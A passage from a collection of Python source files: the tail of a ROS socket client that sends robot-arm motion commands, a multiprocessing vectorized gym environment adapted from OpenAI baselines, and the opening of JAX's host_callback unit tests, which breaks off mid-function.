if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
parallelEnv.py
|
# taken from openai/baseline
# with minor edits
# see https://github.com/openai/baselines/baselines/common/vec_env/subproc_vec_env.py
#
import numpy as np
import gym
from multiprocessing import Process, Pipe
from abc import ABC, abstractmethod
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
@abstractmethod
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
# logger.warn('Render not defined for %s' % self)
pass
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class parallelEnv(VecEnv):
def __init__(self, env_name='PongDeterministic-v4',
n=4, seed=None,
spaces=None):
env_fns = [gym.make(env_name) for _ in range(n)]
if seed is not None:
for i, e in enumerate(env_fns):
e.seed(i+seed)
"""
envs: list of gym environments to run in subprocesses
adopted from openai baseline
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
|
host_callback_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import SkipTest, skipIf
from absl.testing import absltest
from absl.testing import parameterized
from jax import api
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self.test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self.test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r'.*device: (\S+)', s)
if m:
by_device.append((m.group(1), []))
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun`
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(0)
if "function _print_consumer" in matched:
return "tap_func_=_print"
else:
return "..."
what = re.sub(r"tap_func_=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = api.lib.xla_bridge.get_backend()
c = api.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 CPU devices on CPU (due to the flag), also
on TPU (due to how the TPU tests are set up), but only 1 device on
GPU. We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
assert api.device_count() in (1, 2)
expected = expected_2CPUs
if api.device_count() == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(api.devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackIdTapTest(jtu.JaxTestCase):
def setUp(self):
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
super().setUp()
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTest.tearDown")
def test_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
testing_stream.reset()
def test_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00
b=9.00 }""", testing_stream.output)
testing_stream.reset()
def test_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_print_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00
9.00 )""")
testing_stream.reset()
def test_eval_tap_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_jit_simple(self):
jit_fun1 = api.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
testing_stream.reset()
def test_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, api.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
api.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
api.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
testing_stream.reset()
def test_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
def test_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = api.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
testing_stream.reset()
def test_jit_devices(self):
"""Running on multiple devices."""
devices = api.local_devices()
logging.info(f"{self._testMethodName}: has devices {devices}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in devices:
self.assertEqual(112, api.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(len(devices), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(len(devices), len(re.findall(r"112", testing_stream.output)))
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = api.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_multiple_tap(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() == "gpu":
# TODO(necula): it seems that on GPU if multiple host threads run
# a jit computation, the multiple computations are interleaved on the
# GPU. This can result in the outfeed trains being interleaved, which
# will trigger an error. The solution is to fix on GPU the receiving
# logic so that we can outfeed the train as one tuple, and receive it
# one piece as a time. Then the trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
api.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap.
@jtu.skip_on_devices("gpu")
def test_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
api.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
testing_stream.reset()
def test_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = api.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{dtype}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_jit_types(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"id_print jit not implemented for {dtype}.")
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = api.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res)
def test_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
api.jit(hcb.id_print)(arg)
def test_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
api.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += api.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_jit_tap_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = api.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jvp(self):
jvp_fun1 = lambda x, xt: api.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00
0.20 )
transforms: ['jvp'] what: y * 3
( 30.00
0.60 )""", testing_stream.output)
testing_stream.reset()
def test_grad_primal_unused(self):
if not config.omnistaging_enabled:
raise SkipTest("Test requires omnistaging")
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
jaxpr = str(api.make_jaxpr(grad_func)(5.))
# making the Jaxpr does not print anything
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ lambda ; a.
let b = mul a 3.00
c = id_tap[ arg_treedef_=*
tap_func_=_print what='x * 3')
transforms=( ) ] b
_ = mul c 2.00
d = mul 1.00 2.00
e = id_tap[ arg_treedef_=*
tap_func_=_print what='x * 3')
transforms=(('jvp',), ('transpose',)) ] d
f = mul e 3.00
in (f,) }""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(jnp.float32(5.))
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
testing_stream.reset()
def test_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
testing_stream.reset()
def test_grad_grad(self):
if not config.omnistaging_enabled:
raise SkipTest("Test requires omnistaging")
def func(x):
